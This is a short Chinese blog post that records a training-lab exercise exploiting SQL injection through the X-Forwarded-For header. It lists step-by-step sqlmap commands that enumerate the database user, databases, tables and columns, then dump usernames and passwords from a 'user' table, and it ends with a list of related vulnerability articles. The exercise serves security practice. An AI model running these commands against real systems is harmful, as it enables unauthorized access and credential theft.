爆库记录(X-Forwarded-For注入漏洞实战 记录)
2023-09-27 14:25:19 时间
环境位置: https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe
参考: http://www.freesion.com/article/176849949/ 墨者里面的题 都有解
获取登陆地址的请求信息
往请求头信息加入X-Forwarded-For:*
一起写入 保存到本地txt文件 123.txt
执行sqlmap
搜索看有没有漏洞
sqlmap.py -r /Users/lucax/Desktop/123.txt
出现:(存在可以注入)
获取当前用户权限
sqlmap.py -r /Users/lucax/Desktop/123.txt --current-user
获取当前数据库库名
sqlmap.py -r /Users/lucax/Desktop/123.txt --dbs
获取数据库表名
sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar --tables
获取表里面的字段名
sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user --columns
获取字段对应的值
sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user -C id,username,password --dump
相关文章
- 003_crlf注入漏洞
- 如何使用Shodan搜索引擎来诊断漏洞?
- Python与Java曝漏洞,黑客利用FTP注入攻击可绕过防火墙
- 加密软件 VeraCrypt 审计报告公布,发现多个高危漏洞
- 最新!Log4j 2.x 再发版,正式解决核弹级漏洞,又要熬夜了。。。
- Tomcat 又爆出高危漏洞!!Tomcat 8.5 ~10 中招…
- struts漏洞修补过程之S2-016
- 网神SecVSS 3600漏洞扫描系统
- Cookie注入漏洞:可绕过HTTPS并窃取私人信息
- phpMyAdmin setup.php脚本的任意PHP代码注入漏洞
- WordPress 0day漏洞未授权密码重置CVE-2017-8295 PoC已经开始流传 绿盟科技发布预警通告
- Joomla! v3.7 SQL注入高危漏洞技术分析(CVE-2017-8917)
- phpcms v9.6 注入漏洞详细分析
- 零日漏洞DoubleAgent的代码注入和持久性攻击技术分析
- 美国家漏洞数据库显示苹果iOS漏洞最多
- 99.网络安全渗透测试—[常规漏洞挖掘与利用篇15]—[伪随机码漏洞与测试]
- 文件包含漏洞详解
- 【vulhub漏洞复现】CVE-2021-44228 Apache Log4j 远程代码执行漏洞
- Android WebView的Js对象注入漏洞解决方案
- SQL注入漏洞全接触--入门篇
- Web安全 SQL注入漏洞测试.(可以 防止恶意用户利用漏洞)
- Web安全 中间件之 IIS 解析漏洞(利用一个图片 拿到服务器最高权限.)
- [ vulhub漏洞复现篇 ] zabbix SQL注入漏洞 (CVE-2016-10134)